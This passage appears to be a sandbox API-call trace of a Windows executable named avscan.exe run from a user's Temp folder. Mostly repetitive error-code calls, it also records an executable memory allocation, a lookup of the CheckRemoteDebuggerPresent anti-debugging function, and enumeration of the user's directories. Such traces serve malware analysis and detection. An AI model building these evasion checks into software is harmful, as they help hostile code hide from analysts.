[0163.908] GetLastError () returned 0x0 [0163.908] SetLastError (dwErrCode=0x0) [0163.909] GetLastError () returned 0x0 [0163.909] SetLastError (dwErrCode=0x0) [0163.909] GetLastError () returned 0x0 [0163.913] SetLastError (dwErrCode=0x0) [0163.914] VirtualAlloc (lpAddress=0x2b14000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x2b14000 [0163.917] VirtualFree (lpAddress=0x2b14000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0163.918] GetLastError () returned 0x0 [0163.918] SetLastError (dwErrCode=0x0) [0163.918] GetLastError () returned 0x0 [0163.918] SetLastError (dwErrCode=0x0) [0163.919] GetLastError () returned 0x0 [0163.919] SetLastError (dwErrCode=0x0) [0163.919] GetLastError () returned 0x0 [0163.919] SetLastError (dwErrCode=0x0) [0163.919] GetLastError () returned 0x0 [0163.919] SetLastError (dwErrCode=0x0) [0163.919] GetLastError () returned 0x0 [0163.919] SetLastError (dwErrCode=0x0) [0163.919] GetLastError () returned 0x0 [0163.919] SetLastError (dwErrCode=0x0) [0163.919] GetLastError () returned 0x0 [0163.920] SetLastError (dwErrCode=0x0) [0163.920] GetLastError () returned 0x0 [0163.920] SetLastError (dwErrCode=0x0) [0163.920] GetLastError () returned 0x0 [0163.920] SetLastError (dwErrCode=0x0) [0163.920] GetLastError () returned 0x0 [0163.920] SetLastError (dwErrCode=0x0) [0163.921] GetLastError () returned 0x0 [0163.921] SetLastError (dwErrCode=0x0) [0163.921] GetLastError () returned 0x0 [0163.921] SetLastError (dwErrCode=0x0) [0163.921] GetLastError () returned 0x0 [0163.921] SetLastError (dwErrCode=0x0) [0163.922] GetLastError () returned 0x0 [0163.922] SetLastError (dwErrCode=0x0) [0163.922] GetLastError () returned 0x0 [0163.922] SetLastError (dwErrCode=0x0) [0163.922] GetLastError () returned 0x0 [0163.922] SetLastError (dwErrCode=0x0) [0163.922] GetLastError () returned 0x0 [0163.923] SetLastError (dwErrCode=0x0) [0163.923] GetLastError () returned 0x0 [0163.923] SetLastError (dwErrCode=0x0) [0163.923] GetLastError () returned 0x0 [0163.923] SetLastError (dwErrCode=0x0) [0163.924] GetLastError () returned 0x0 [0163.924] SetLastError (dwErrCode=0x0) [0163.924] GetLastError () returned 0x0 [0163.924] SetLastError (dwErrCode=0x0) [0163.924] GetLastError () returned 0x0 [0163.924] SetLastError (dwErrCode=0x0) [0163.924] GetLastError () returned 0x0 [0163.925] SetLastError (dwErrCode=0x0) [0163.925] GetLastError () returned 0x0 [0163.947] SetLastError (dwErrCode=0x0) [0163.947] GetLastError () returned 0x0 [0163.947] SetLastError (dwErrCode=0x0) [0163.947] GetLastError () returned 0x0 [0163.947] SetLastError (dwErrCode=0x0) [0163.947] GetLastError () returned 0x0 [0163.948] SetLastError (dwErrCode=0x0) [0163.948] GetLastError () returned 0x0 [0163.948] SetLastError (dwErrCode=0x0) [0163.948] GetLastError () returned 0x0 [0163.948] SetLastError (dwErrCode=0x0) [0163.948] GetLastError () returned 0x0 [0163.948] SetLastError (dwErrCode=0x0) [0163.949] GetLastError () returned 0x0 [0163.949] SetLastError (dwErrCode=0x0) [0163.949] GetLastError () returned 0x0 [0163.949] SetLastError (dwErrCode=0x0) [0163.949] GetLastError () returned 0x0 [0163.950] SetLastError (dwErrCode=0x0) [0163.950] GetLastError () returned 0x0 [0163.950] SetLastError (dwErrCode=0x0) [0163.950] GetLastError () returned 0x0 [0163.950] SetLastError (dwErrCode=0x0) [0163.950] GetLastError () returned 0x0 [0163.951] SetLastError (dwErrCode=0x0) [0163.951] GetLastError () returned 0x0 [0163.951] SetLastError (dwErrCode=0x0) [0163.951] GetLastError () returned 0x0 [0163.951] SetLastError (dwErrCode=0x0) [0163.963] GetLastError () returned 0x0 [0163.964] SetLastError (dwErrCode=0x0) [0163.964] GetLastError () returned 0x0 [0163.964] SetLastError (dwErrCode=0x0) [0163.964] GetLastError () returned 0x0 [0163.964] SetLastError (dwErrCode=0x0) [0163.964] GetLastError () returned 0x0 [0163.964] SetLastError (dwErrCode=0x0) [0163.964] GetLastError () returned 0x0 [0163.965] SetLastError (dwErrCode=0x0) [0163.965] GetLastError () returned 0x0 [0163.965] SetLastError (dwErrCode=0x0) [0163.965] GetLastError () returned 0x0 [0163.965] SetLastError (dwErrCode=0x0) [0163.965] GetLastError () returned 0x0 [0163.966] SetLastError (dwErrCode=0x0) [0163.966] GetCurrentThreadId () returned 0xba4 [0163.966] GetLastError () returned 0x0 [0163.966] SetLastError (dwErrCode=0x0) [0163.966] GetLastError () returned 0x0 [0163.966] SetLastError (dwErrCode=0x0) [0163.967] GetLastError () returned 0x0 [0163.967] SetLastError (dwErrCode=0x0) [0163.967] GetLastError () returned 0x0 [0163.967] SetLastError (dwErrCode=0x0) [0163.967] GetLastError () returned 0x0 [0163.967] SetLastError (dwErrCode=0x0) [0163.968] GetCurrentThreadId () returned 0xba4 [0163.968] GetLastError () returned 0x0 [0163.968] SetLastError (dwErrCode=0x0) [0163.968] GetLastError () returned 0x0 [0163.968] SetLastError (dwErrCode=0x0) [0163.968] GetLastError () returned 0x0 [0163.969] SetLastError (dwErrCode=0x0) [0163.969] GetCurrentThreadId () returned 0xba4 [0163.969] GetLastError () returned 0x0 [0163.969] SetLastError (dwErrCode=0x0) [0163.969] GetLastError () returned 0x0 [0163.970] SetLastError (dwErrCode=0x0) [0163.970] GetLastError () returned 0x0 [0163.970] SetLastError (dwErrCode=0x0) [0163.970] GetLastError () returned 0x0 [0163.970] SetLastError (dwErrCode=0x0) [0163.970] GetLastError () returned 0x0 [0163.971] SetLastError (dwErrCode=0x0) [0163.971] GetLastError () returned 0x0 [0163.971] SetLastError (dwErrCode=0x0) [0163.971] GetCurrentThreadId () returned 0xba4 [0163.971] GetLastError () returned 0x0 [0163.986] SetLastError (dwErrCode=0x0) [0163.986] GetLastError () returned 0x0 [0163.986] SetLastError (dwErrCode=0x0) [0163.986] GetLastError () returned 0x0 [0163.986] SetLastError (dwErrCode=0x0) [0163.986] GetCurrentThreadId () returned 0xba4 [0163.987] GetLastError () returned 0x0 [0163.987] SetLastError (dwErrCode=0x0) [0163.987] GetLastError () returned 0x0 [0163.991] SetLastError (dwErrCode=0x0) [0163.991] GetLastError () returned 0x0 [0163.992] SetLastError (dwErrCode=0x0) [0163.992] GetCurrentThreadId () returned 0xba4 [0163.992] GetLastError () returned 0x0 [0163.992] SetLastError (dwErrCode=0x0) [0163.992] GetLastError () returned 0x0 [0163.993] SetLastError (dwErrCode=0x0) [0163.993] GetLastError () returned 0x0 [0163.993] SetLastError (dwErrCode=0x0) [0163.993] GetCurrentThreadId () returned 0xba4 [0163.993] GetLastError () returned 0x0 [0163.994] SetLastError (dwErrCode=0x0) [0163.994] GetLastError () returned 0x0 [0163.994] SetLastError (dwErrCode=0x0) [0163.994] GetLastError () returned 0x0 [0163.994] SetLastError (dwErrCode=0x0) [0163.994] GetCurrentThreadId () returned 0xba4 [0163.994] GetLastError () returned 0x0 [0163.995] SetLastError (dwErrCode=0x0) [0163.995] GetLastError () returned 0x0 [0163.995] SetLastError (dwErrCode=0x0) [0163.995] GetLastError () returned 0x0 [0163.995] SetLastError (dwErrCode=0x0) [0163.996] GetCurrentThreadId () returned 0xba4 [0163.996] GetLastError () returned 0x0 [0163.996] SetLastError (dwErrCode=0x0) [0163.996] GetLastError () returned 0x0 [0163.996] SetLastError (dwErrCode=0x0) [0163.996] GetLastError () returned 0x0 [0163.997] SetLastError (dwErrCode=0x0) [0163.997] GetLastError () returned 0x0 [0163.997] SetLastError (dwErrCode=0x0) [0163.997] GetLastError () returned 0x0 [0163.997] SetLastError (dwErrCode=0x0) [0163.997] GetLastError () returned 0x0 [0163.998] SetLastError (dwErrCode=0x0) [0163.998] GetLastError () returned 0x0 [0163.998] SetLastError (dwErrCode=0x0) [0163.998] GetLastError () returned 0x0 [0163.998] SetLastError (dwErrCode=0x0) [0163.998] GetLastError () returned 0x0 [0163.999] SetLastError (dwErrCode=0x0) [0163.999] GetLastError () returned 0x0 [0163.999] SetLastError (dwErrCode=0x0) [0163.999] GetLastError () returned 0x0 [0163.999] SetLastError (dwErrCode=0x0) [0163.999] GetLastError () returned 0x0 [0163.999] SetLastError (dwErrCode=0x0) [0163.999] GetLastError () returned 0x0 [0164.000] SetLastError (dwErrCode=0x0) [0164.000] GetLastError () returned 0x0 [0164.000] SetLastError (dwErrCode=0x0) [0164.000] GetLastError () returned 0x0 [0164.000] SetLastError (dwErrCode=0x0) [0164.000] GetLastError () returned 0x0 [0164.000] SetLastError (dwErrCode=0x0) [0164.000] GetLastError () returned 0x0 [0164.001] SetLastError (dwErrCode=0x0) [0164.001] GetLastError () returned 0x0 [0164.001] SetLastError (dwErrCode=0x0) [0164.001] GetLastError () returned 0x0 [0164.001] SetLastError (dwErrCode=0x0) [0164.001] GetLastError () returned 0x0 [0164.001] SetLastError (dwErrCode=0x0) [0164.001] GetLastError () returned 0x0 [0164.001] SetLastError (dwErrCode=0x0) [0164.001] GetLastError () returned 0x0 [0164.002] SetLastError (dwErrCode=0x0) [0164.002] GetLastError () returned 0x0 [0164.002] SetLastError (dwErrCode=0x0) [0164.002] GetLastError () returned 0x0 [0164.002] SetLastError (dwErrCode=0x0) [0164.002] GetLastError () returned 0x0 [0164.002] SetLastError (dwErrCode=0x0) [0164.002] GetLastError () returned 0x0 [0164.003] SetLastError (dwErrCode=0x0) [0164.003] GetLastError () returned 0x0 [0164.007] SetLastError (dwErrCode=0x0) [0164.007] GetLastError () returned 0x0 [0164.008] SetLastError (dwErrCode=0x0) [0164.008] GetLastError () returned 0x0 [0164.008] SetLastError (dwErrCode=0x0) [0164.008] GetLastError () returned 0x0 [0164.008] SetLastError (dwErrCode=0x0) [0164.008] GetLastError () returned 0x0 [0164.009] SetLastError (dwErrCode=0x0) [0164.009] GetLastError () returned 0x0 [0164.009] SetLastError (dwErrCode=0x0) [0164.009] GetLastError () returned 0x0 [0164.009] SetLastError (dwErrCode=0x0) [0164.010] GetLastError () returned 0x0 [0164.010] SetLastError (dwErrCode=0x0) [0164.010] GetLastError () returned 0x0 [0164.010] SetLastError (dwErrCode=0x0) [0164.010] GetLastError () returned 0x0 [0164.010] SetLastError (dwErrCode=0x0) [0164.010] GetLastError () returned 0x0 [0164.011] SetLastError (dwErrCode=0x0) [0164.011] GetLastError () returned 0x0 [0164.011] SetLastError (dwErrCode=0x0) [0164.011] GetLastError () returned 0x0 [0164.011] SetLastError (dwErrCode=0x0) [0164.011] GetLastError () returned 0x0 [0164.011] SetLastError (dwErrCode=0x0) [0164.011] GetLastError () returned 0x0 [0164.012] SetLastError (dwErrCode=0x0) [0164.012] GetLastError () returned 0x0 [0164.012] SetLastError (dwErrCode=0x0) [0164.012] GetLastError () returned 0x0 [0164.012] SetLastError (dwErrCode=0x0) [0164.012] GetLastError () returned 0x0 [0164.013] SetLastError (dwErrCode=0x0) [0164.013] GetLastError () returned 0x0 [0164.013] SetLastError (dwErrCode=0x0) [0164.013] GetLastError () returned 0x0 [0164.013] SetLastError (dwErrCode=0x0) [0164.013] GetLastError () returned 0x0 [0164.013] SetLastError (dwErrCode=0x0) [0164.013] GetLastError () returned 0x0 [0164.014] SetLastError (dwErrCode=0x0) [0164.014] GetLastError () returned 0x0 [0164.014] SetLastError (dwErrCode=0x0) [0164.014] GetLastError () returned 0x0 [0164.014] SetLastError (dwErrCode=0x0) [0164.014] GetLastError () returned 0x0 [0164.014] SetLastError (dwErrCode=0x0) [0164.015] GetLastError () returned 0x0 [0164.015] SetLastError (dwErrCode=0x0) [0164.015] GetLastError () returned 0x0 [0164.015] SetLastError (dwErrCode=0x0) [0164.015] VirtualFree (lpAddress=0x2b04000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0164.016] GetLastError () returned 0x0 [0164.017] SetLastError (dwErrCode=0x0) [0164.017] GetLastError () returned 0x0 [0164.017] SetLastError (dwErrCode=0x0) [0164.017] GetLastError () returned 0x0 [0164.017] SetLastError (dwErrCode=0x0) [0164.017] GetLastError () returned 0x0 [0164.018] SetLastError (dwErrCode=0x0) [0164.018] GetLastError () returned 0x0 [0164.018] SetLastError (dwErrCode=0x0) [0164.018] GetLastError () returned 0x0 [0164.018] SetLastError (dwErrCode=0x0) [0164.018] GetLastError () returned 0x0 [0164.033] SetLastError (dwErrCode=0x0) [0164.033] GetLastError () returned 0x0 [0164.033] SetLastError (dwErrCode=0x0) [0164.034] GetLastError () returned 0x0 [0164.034] SetLastError (dwErrCode=0x0) [0164.034] GetLastError () returned 0x0 [0164.041] SetLastError (dwErrCode=0x0) [0164.041] GetLastError () returned 0x0 [0164.042] SetLastError (dwErrCode=0x0) [0164.042] GetLastError () returned 0x0 [0164.042] SetLastError (dwErrCode=0x0) [0164.042] GetLastError () returned 0x0 [0164.042] SetLastError (dwErrCode=0x0) [0164.042] GetLastError () returned 0x0 [0164.043] SetLastError (dwErrCode=0x0) [0164.043] GetLastError () returned 0x0 [0164.043] SetLastError (dwErrCode=0x0) [0164.043] GetLastError () returned 0x0 [0164.044] SetLastError (dwErrCode=0x0) [0164.044] GetLastError () returned 0x0 [0164.044] SetLastError (dwErrCode=0x0) [0164.044] GetLastError () returned 0x0 [0164.044] SetLastError (dwErrCode=0x0) [0164.044] GetLastError () returned 0x0 [0164.045] SetLastError (dwErrCode=0x0) [0164.045] GetLastError () returned 0x0 [0164.045] SetLastError (dwErrCode=0x0) [0164.045] GetLastError () returned 0x0 [0164.045] SetLastError (dwErrCode=0x0) [0164.046] GetLastError () returned 0x0 [0164.046] SetLastError (dwErrCode=0x0) [0164.046] GetLastError () returned 0x0 [0164.046] SetLastError (dwErrCode=0x0) [0164.046] GetLastError () returned 0x0 [0164.047] SetLastError (dwErrCode=0x0) [0164.047] GetLastError () returned 0x0 [0164.047] SetLastError (dwErrCode=0x0) [0164.047] GetLastError () returned 0x0 [0164.047] SetLastError (dwErrCode=0x0) [0164.047] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0164.048] GetLastError () returned 0x0 [0164.048] SetLastError (dwErrCode=0x0) [0164.048] GetLastError () returned 0x0 [0164.048] SetLastError (dwErrCode=0x0) [0164.048] GetLastError () returned 0x0 [0164.049] SetLastError (dwErrCode=0x0) [0164.049] GetProcAddress (hModule=0x75a80000, lpProcName="CheckRemoteDebuggerPresent") returned 0x75abb0de [0164.049] GetLastError () returned 0x0 [0164.049] SetLastError (dwErrCode=0x0) [0164.049] GetLastError () returned 0x0 [0164.049] SetLastError (dwErrCode=0x0) [0164.054] GetLastError () returned 0x0 [0164.054] SetLastError (dwErrCode=0x0) [0164.054] GetLocalTime (in: lpSystemTime=0x28fe6c | out: lpSystemTime=0x28fe6c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x3b, wMilliseconds=0x380)) [0164.054] GetLastError () returned 0x0 [0164.055] SetLastError (dwErrCode=0x0) [0164.055] GetLastError () returned 0x0 [0164.055] SetLastError (dwErrCode=0x0) [0164.055] GetCurrentThreadId () returned 0xba4 [0164.055] GetLastError () returned 0x0 [0164.056] SetLastError (dwErrCode=0x0) [0164.056] GetLastError () returned 0x0 [0164.056] SetLastError (dwErrCode=0x0) [0164.056] GetLastError () returned 0x0 [0164.056] SetLastError (dwErrCode=0x0) [0164.056] GetLastError () returned 0x0 [0164.056] SetLastError (dwErrCode=0x0) [0164.056] GetLastError () returned 0x0 [0164.057] SetLastError (dwErrCode=0x0) [0164.057] GetCurrentThreadId () returned 0xba4 [0164.057] GetLastError () returned 0x0 [0164.057] SetLastError (dwErrCode=0x0) [0164.057] GetLastError () returned 0x0 [0164.057] SetLastError (dwErrCode=0x0) [0164.057] GetLastError () returned 0x0 [0164.058] SetLastError (dwErrCode=0x0) [0164.058] GetLastError () returned 0x0 [0164.058] SetLastError (dwErrCode=0x0) [0164.058] GetTimeZoneInformation (in: lpTimeZoneInformation=0x28fdbc | out: lpTimeZoneInformation=0x28fdbc) returned 0x2 [0164.108] GetLastError () returned 0x0 [0164.108] SetLastError (dwErrCode=0x0) [0164.108] GetLastError () returned 0x0 [0164.109] SetLastError (dwErrCode=0x0) [0164.109] GetCurrentThreadId () returned 0xba4 [0164.109] GetLastError () returned 0x0 [0164.109] SetLastError (dwErrCode=0x0) [0164.109] GetLastError () returned 0x0 [0164.109] SetLastError (dwErrCode=0x0) [0164.109] GetLastError () returned 0x0 [0164.110] SetLastError (dwErrCode=0x0) [0164.110] GetCurrentThreadId () returned 0xba4 [0164.110] GetLastError () returned 0x0 [0164.110] SetLastError (dwErrCode=0x0) [0164.110] GetLastError () returned 0x0 [0164.110] SetLastError (dwErrCode=0x0) [0164.110] GetLastError () returned 0x0 [0164.110] SetLastError (dwErrCode=0x0) [0164.110] GetLastError () returned 0x0 [0164.111] SetLastError (dwErrCode=0x0) [0164.111] GetLocalTime (in: lpSystemTime=0x28fe6c | out: lpSystemTime=0x28fe6c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x3b, wMilliseconds=0x3af)) [0164.111] GetLastError () returned 0x0 [0164.111] SetLastError (dwErrCode=0x0) [0164.111] GetLastError () returned 0x0 [0164.111] SetLastError (dwErrCode=0x0) [0164.112] GetCurrentThreadId () returned 0xba4 [0164.112] GetLastError () returned 0x0 [0164.112] SetLastError (dwErrCode=0x0) [0164.112] GetLastError () returned 0x0 [0164.117] SetLastError (dwErrCode=0x0) [0164.117] GetLastError () returned 0x0 [0164.117] SetLastError (dwErrCode=0x0) [0164.117] GetLastError () returned 0x0 [0164.117] SetLastError (dwErrCode=0x0) [0164.117] GetCurrentThreadId () returned 0xba4 [0164.118] GetLastError () returned 0x0 [0164.118] SetLastError (dwErrCode=0x0) [0164.118] GetLastError () returned 0x0 [0164.118] SetLastError (dwErrCode=0x0) [0164.118] GetLastError () returned 0x0 [0164.118] SetLastError (dwErrCode=0x0) [0164.118] GetLastError () returned 0x0 [0164.119] SetLastError (dwErrCode=0x0) [0164.119] GetTimeZoneInformation (in: lpTimeZoneInformation=0x28fdbc | out: lpTimeZoneInformation=0x28fdbc) returned 0x2 [0164.119] GetLastError () returned 0x0 [0164.119] SetLastError (dwErrCode=0x0) [0164.119] GetLastError () returned 0x0 [0164.119] SetLastError (dwErrCode=0x0) [0164.119] GetCurrentThreadId () returned 0xba4 [0164.119] GetLastError () returned 0x0 [0164.120] SetLastError (dwErrCode=0x0) [0164.120] GetLastError () returned 0x0 [0164.120] SetLastError (dwErrCode=0x0) [0164.120] GetLastError () returned 0x0 [0164.125] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.125] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.126] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.126] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.126] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.127] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.142] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.142] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.143] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.148] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.149] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.149] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.150] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.150] GetLastError () returned 0x0 [0164.150] SetLastError (dwErrCode=0x0) [0164.150] GetLastError () returned 0x0 [0164.151] SetLastError (dwErrCode=0x0) [0164.151] GetLastError () returned 0x0 [0164.151] SetLastError (dwErrCode=0x0) [0164.151] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x108bcc4, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0164.152] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\Ap", cchLength=0x14 | out: lpsz="c:\\users\\keecfm~1\\ap") returned 0x14 [0164.152] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f9cc, lpFilePart=0x28f9c8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f9c8*="avscan.exe") returned 0x2f [0164.152] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), lpFindFileData=0x28fc28 | out: lpFindFileData=0x28fc28*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf38c1580, ftCreationTime.dwHighDateTime=0x1da9884, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf67c4800, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x1442557, dwReserved0=0x557580, dwReserved1=0x0, cFileName="avscan.exe", cAlternateFileName="")) returned 0x108b2b8 [0164.153] FileTimeToLocalFileTime (in: lpFileTime=0x28fc3c, lpLocalFileTime=0x28fbc0 | out: lpLocalFileTime=0x28fbc0) returned 1 [0164.153] FileTimeToDosDateTime (in: lpFileTime=0x28fbc0, lpFatDate=0x28fc0a, lpFatTime=0x28fc08 | out: lpFatDate=0x28fc0a, lpFatTime=0x28fc08) returned 1 [0164.153] SysReAllocStringLen (in: pbstr=0x28fc00*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fc00*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0164.153] SysReAllocStringLen (in: pbstr=0x28fbf8*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", len=0x2f | out: pbstr=0x28fbf8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0164.153] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchLength=0x2f | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe") returned 0x2f [0164.153] SysReAllocStringLen (in: pbstr=0x28ff10*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe", len=0x2f | out: pbstr=0x28ff10*="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe") returned 1 [0164.154] GetLastError () returned 0x0 [0164.154] SetLastError (dwErrCode=0x0) [0164.154] GetLastError () returned 0x0 [0164.154] SetLastError (dwErrCode=0x0) [0164.154] GetLastError () returned 0x0 [0164.154] SetLastError (dwErrCode=0x0) [0164.154] SysReAllocStringLen (in: pbstr=0x557578*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe", len=0x2f | out: pbstr=0x557578*="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe") returned 1 [0164.155] GetLastError () returned 0x0 [0164.155] SetLastError (dwErrCode=0x0) [0164.155] GetLastError () returned 0x0 [0164.155] SetLastError (dwErrCode=0x0) [0164.155] GetLastError () returned 0x0 [0164.155] SetLastError (dwErrCode=0x0) [0164.156] SysReAllocStringLen (in: pbstr=0x2b1004c*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe", len=0x2f | out: pbstr=0x2b1004c*="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe") returned 1 [0164.156] SysReAllocStringLen (in: pbstr=0x2b10060*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", len=0x25 | out: pbstr=0x2b10060*="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 1 [0164.156] SysReAllocStringLen (in: pbstr=0x28fe60*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", len=0x25 | out: pbstr=0x28fe60*="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 1 [0164.157] CharLowerBuffW (in: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0164.157] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", len=0x25 | out: pbstr=0x2b1009c*="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 1 [0164.157] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.157] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="users", len=0x5 | out: pbstr=0x2ad0834*="users") returned 1 [0164.158] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="keecfm~1", len=0x8 | out: pbstr=0x2b100d4*="keecfm~1") returned 1 [0164.158] SysReAllocStringLen (in: pbstr=0x2b100e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x2b100e0*="appdata") returned 1 [0164.159] SysReAllocStringLen (in: pbstr=0x2b100ec*=0x0, psz="local", len=0x5 | out: pbstr=0x2b100ec*="local") returned 1 [0164.164] SysReAllocStringLen (in: pbstr=0x2b100f8*=0x0, psz="temp", len=0x4 | out: pbstr=0x2b100f8*="temp") returned 1 [0164.164] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.165] SysReAllocStringLen (in: pbstr=0x28fe64*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe64*="c:\\") returned 1 [0164.165] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0164.165] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x108c6f8 [0164.165] FindNextFileW (in: hFindFile=0x108c6f8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0164.166] GetLastError () returned 0x12 [0164.166] FindClose (in: hFindFile=0x108c6f8 | out: hFindFile=0x108c6f8) returned 1 [0164.166] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0164.167] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe64*="c:\\Users\\") returned 1 [0164.167] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfm~1", len=0x8 | out: pbstr=0x28fae8*="keecfm~1") returned 1 [0164.167] FindFirstFileW (in: lpFileName="c:\\Users\\keecfm~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108c6f8 [0164.167] 